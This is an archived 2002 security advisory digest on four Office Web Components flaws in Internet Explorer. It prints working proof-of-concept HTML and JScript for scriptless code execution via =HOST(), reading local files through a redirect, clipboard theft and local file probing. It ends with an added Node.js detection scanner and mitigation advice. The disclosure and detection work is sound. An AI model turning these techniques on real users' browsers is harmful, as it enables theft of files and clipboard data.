26th Sep 2002 [SBWID-5254]
COMMAND
Multiple vulnerabilities via Office Web Components / IE
SYSTEMS AFFECTED
IE5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + Office 2000 (OWC9), all patches.
IE6 Win2000 + Office 2000 (OWC9), all patches.
IE5.5sp2 NT4 sp6a + OWC10, all patches.
IE6sp1 Win2000 + OWC10, all patches.
IE6 WinXP + Office XP (OWC10), all patches.
IE6sp1 WinXP + Office XP (OWC10), all patches.
PROBLEM
In GreyMagic Security [http://security.greymagic.com] advisories
[GM#005-IE] [GM#006-IE] [GM#007-IE] [GM#008-IE], the GreyMagic security
team unveiled multiple vulnerabilities in Office Web Components:
Introduction:
=============
Office Web Components (OWC) is a group of safe for scripting components
used to enrich HTML documents with Spreadsheets, Charts, Pivot tables
and more.
OWC ships with the Microsoft Office package, but it is also
downloadable as a separate (free for viewing only) component.
Vulnerability N°1 : Scripting for the scriptless
================================================
Office XP introduced OWC10, which added many interesting features. One
of the features added to the Spreadsheet component is the "=HOST()"
formula, which returns a handle to the hosting environment.
It is possible to use this formula in order to manipulate the DOM,
which is a security issue in itself when Active Scripting is disabled,
but it's somewhat limited because there's no way to add logic
(conditions, loops, etc.) to the calls made.
However, with a bit of manipulation it is possible to get Active
Scripting to kick in. By using the setTimeout method of the window
object through the "=HOST()" formula it is possible to execute script
with any language available to the host (IE).
Exploit:
========
This example will display a message box even when scripting is
disabled; it contains many quotes because several levels of escaping
are needed:
<object classid="clsid:0002E551-0000-0000-C000-000000000046" style="display:none">
    <param name="csvdata" value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3 equals """"+(i+3));"",10,""jscript"")"'>
</object>
See : [http://security.greymagic.com/adv/gm005-ie/]
Vulnerability N°2 : Reading local files
=======================================
Using the Spreadsheet component in both OWC9 and OWC10, it is possible
to read any local or remote file.
The "LoadText" method of the Range object takes a URL as its first
argument; it throws an error if the URL supplied is not in the same
domain as the current document.
However, this protection can be easily bypassed by supplying a URL that
will redirect to the desired local or remote file.
OWC is fooled to think that the URL is safe and loads the contents of
the file into the spreadsheet; it is then trivial to retrieve the
content and transfer it to the server or use it in malicious ways.
Exploit:
========
This example reads the contents of the file "c:/test.txt"; the URL
"getFile.asp" redirects to "file://c:/test.txt", which is what lets the
page access it:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    try {
        // Load file into spreadsheet
        oSP.ActiveSheet.UsedRange.LoadText("getFile.asp");
        // Read the spreadsheet
        var oRng=oSP.ActiveSheet.UsedRange,
            iRows=oRng.Rows.Count,
            iCols=oRng.Columns.Count,
            sRes="";
        for (var iCRow=1;iCRow<=iRows;iCRow++) {
            for (var iCCol=1;iCCol<=iCols;iCCol++) {
                sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
            }
            sRes+="\n";
        }
        // Display result
        alert(sRes);
    }
    catch (oErr) {
        // Failed
        alert("File not found.");
    }
}
</script>
The class id of the <object> element above is for the spreadsheet
component of OWC9 (Microsoft Office 2000); OWC10's class id is
"0002E551-0000-0000-C000-000000000046", and no further changes to the
code are needed.
An attacker can actually use the fallback feature of the <object>
element to include either one of these components:
<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10" style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9" style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>
See : [http://security.greymagic.com/adv/gm006-ie/]
Vulnerability N°3 : Controlling the clipboard
=============================================
It is well documented that IE lets anybody read and write clipboard
data by default; until now it was possible to disable this feature by
setting "Allow paste operations via script" to "Disable".
It is now possible to gain control over the clipboard even when it is
disabled in the security zone, via the Spreadsheet component in both
OWC9 and OWC10.
The "Paste" method of the Range object and the "Copy" method of the
Cell object both give an attacker full control over clipboard
operations.
The attacker can continuously monitor the victim's clipboard and log
the findings to a server for later inspection. It is also possible for
an attacker to place data inside the clipboard.
Exploit:
========
Reading the contents of the clipboard:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    // Paste to spreadsheet
    oSP.ActiveSheet.UsedRange.Paste();
    // Read the spreadsheet
    var oRng=oSP.ActiveSheet.UsedRange,
        iRows=oRng.Rows.Count,
        iCols=oRng.Columns.Count,
        sRes="";
    for (var iCRow=1;iCRow<=iRows;iCRow++) {
        for (var iCCol=1;iCCol<=iCols;iCCol++) {
            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
        }
        sRes+="\n";
    }
    // Display result
    alert(sRes);
}
</script>
Assigning the clipboard's content:
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    oSP.Cells(1,1).Value="Trustworthy computing";
    oSP.Cells(1,1).Copy();
}
</script>
The class id of the <object> element above is for the spreadsheet
component of OWC9 (Microsoft Office 2000); OWC10's class id is
"0002E551-0000-0000-C000-000000000046", and no further changes to the
code are needed.
An attacker can actually use the fallback feature of the <object>
element to include either one of these components:
<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10" style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9" style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>
See : [http://security.greymagic.com/adv/gm007-ie/]
Vulnerability N°4 : Multiple local files detection
==================================================
There are several ways to check whether local files exist using OWC9
and OWC10.
The first vulnerability is in the Chart component in both OWC9 and
OWC10. The "Load" method does not perform any security check on the
assigned URL and throws an error when given a file name that does not
exist; if no error is thrown, the file exists.
The second vulnerability is in the Spreadsheet component in OWC10. The
"XMLURL" property blindly follows redirections, so it is possible to
assign it a URL which redirects to a local file and determine whether
it exists or not by the error thrown. It is also possible to read
properly formatted WorkSheet XML files from disallowed locations in the
same way.
The third vulnerability is in the DataSourceControl component in OWC10.
The "ConnectionFile" property does not perform any security checks on
the assigned URL. Therefore, it is possible to assign a local file and
determine whether it exists or not by the error thrown.
Exploit:
========
A simple exploit for the first vulnerability:
<object id="oCS" classid="clsid:0002E500-0000-0000-C000-000000000046" style="display:none"></object>
<!-- For OWC10 the clsid is "0002E556-0000-0000-C000-000000000046" -->
<script language="jscript">
onload=function () {
    try {
        oCS.Load("file://c:/test.txt");
        alert("File exists!");
    }
    catch (oErr) {
        alert("File does not exist.");
    }
}
</script>
A simple exploit for the second vulnerability; "getFile.asp" internally
redirects to "file://c:/test.txt":
<object id="oSP" classid="clsid:0002E551-0000-0000-C000-000000000046" style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oSP.XMLURL="getFile.asp";
    }
    catch (oErr) {
        alert(oErr.description.indexOf("valid path")==-1 ? "File exists!" : "File does not exist.");
    }
}
</script>
A simple exploit for the third vulnerability:
<object id="oDS" classid="clsid:0002E553-0000-0000-C000-000000000046" style="display:block"></object>
<script language="jscript">
onload=function () {
    try {
        oDS.ConnectionFile="file://c:/test.txt";
    }
    catch (oErr) {
        // The string literal was split across two lines in the original; it is one line here
        alert(oErr.number==-2146697211 ? "File does not exist." : "File exists!");
    }
}
</script>
See : [http://security.greymagic.com/adv/gm008-ie/]
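As an added example (not code from the GreyMagic advisories or from Microsoft), the following Node.js script shows what a defender could run over fetched HTML in a proxy, mail gateway or log pipeline to flag pages that embed the Office Web Components covered by all four advisories above. It looks for the OWC class ids given on this page, unwraps the three escaping layers (HTML attribute, CSV cell, formula string literal) of a "csvdata" parameter to expose a "=HOST()" formula as in vulnerability N°1, and reports page script that touches the LoadText, Paste, Copy, XMLURL, ConnectionFile and Load members named in vulnerabilities N°2 to N°4. The sample page is constructed for this example; the component labels and the "findings" record shape are this example's own.

```javascript
// Added example, not code from the GreyMagic advisories or from Microsoft:
// a content-scanning check a proxy, mail gateway or log pipeline could run
// over HTML to flag pages embedding the Office Web Components discussed in
// the advisories. Class ids and member names come from the advisory text;
// the component labels and the sample page are constructed here.
const OWC_CLSIDS = {
  "0002E510-0000-0000-C000-000000000046": "OWC9 Spreadsheet",
  "0002E551-0000-0000-C000-000000000046": "OWC10 Spreadsheet",
  "0002E500-0000-0000-C000-000000000046": "OWC9 Chart",
  "0002E556-0000-0000-C000-000000000046": "OWC10 Chart",
  "0002E553-0000-0000-C000-000000000046": "OWC10 DataSourceControl",
};

// Members the advisories show being abused (file read, clipboard access,
// redirect-following loads, file existence probes).
const SENSITIVE_MEMBERS = ["LoadText", "Paste", "Copy", "XMLURL", "ConnectionFile", "Load"];

// Undo one CSV quoting layer: "abc""def" -> abc"def
function csvUnquote(cell) {
  const s = cell.trim();
  if (s.length >= 2 && s.startsWith('"') && s.endsWith('"')) {
    return s.slice(1, -1).replace(/""/g, '"');
  }
  return s;
}

// Pull the string literals out of a spreadsheet formula. Inside a formula
// literal a doubled quote is an escaped quote, which is the third escaping
// layer (HTML attribute, CSV cell, formula literal) in the =HOST() case.
function formulaStringLiterals(formula) {
  const literals = [];
  const re = /"((?:[^"]|"")*)"/g;
  let m;
  while ((m = re.exec(formula)) !== null) {
    literals.push(m[1].replace(/""/g, '"'));
  }
  return literals;
}

// Scan raw HTML and return a list of findings; an empty list means nothing
// OWC-related was seen.
function scanHtml(html) {
  const findings = [];
  let m;

  // 1. <object> elements whose classid is one of the OWC components.
  const clsidRe = /classid\s*=\s*["']?clsid:([0-9A-Fa-f-]{36})/g;
  while ((m = clsidRe.exec(html)) !== null) {
    const clsid = m[1].toUpperCase();
    if (OWC_CLSIDS[clsid]) {
      findings.push({ kind: "owc-object", clsid, component: OWC_CLSIDS[clsid] });
    }
  }

  // 2. A csvdata <param> whose first cell is a =HOST() formula: script
  //    execution without Active Scripting (vulnerability 1).
  const csvRe = /name\s*=\s*["']csvdata["']\s+value\s*=\s*'([^']*)'/gi;
  while ((m = csvRe.exec(html)) !== null) {
    const formula = csvUnquote(m[1]);
    if (/^=HOST\(/i.test(formula)) {
      findings.push({ kind: "host-formula", formula, literals: formulaStringLiterals(formula) });
    }
  }

  // 3. Page script touching the members named in the advisories.
  for (const member of SENSITIVE_MEMBERS) {
    if (new RegExp("\\." + member + "\\s*[(=]").test(html)) {
      findings.push({ kind: "sensitive-member", member });
    }
  }
  return findings;
}

// Constructed sample page shaped like the advisory's exploits (not a real site).
const SAMPLE_HTML = `
<object classid="clsid:0002E551-0000-0000-C000-000000000046" style="display:none">
<param name="csvdata" value='"=HOST().parentWindow.setTimeout(""var i=20; alert(i+""""+3 equals """"+(i+3));"",10,""jscript"")"'>
</object>
<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">onload=function () { oSP.ActiveSheet.UsedRange.Paste(); }</script>
`;

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
```

Run with `node scan.js` to print the findings for the constructed sample: two OWC spreadsheet objects, one "=HOST()" formula whose inner literal decodes to the JScript that setTimeout would run, and a Paste call. The check is regex-based and heuristic (obfuscated markup or script assembled at runtime will not be caught), so it is a triage aid for finding pages that warrant a look, not a substitute for the zone setting given under SOLUTION.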
SOLUTION
Set "Run ActiveX controls and plug-ins" to "Disable" or simply
remove/disable OWC until a patch becomes available.
No patches yet.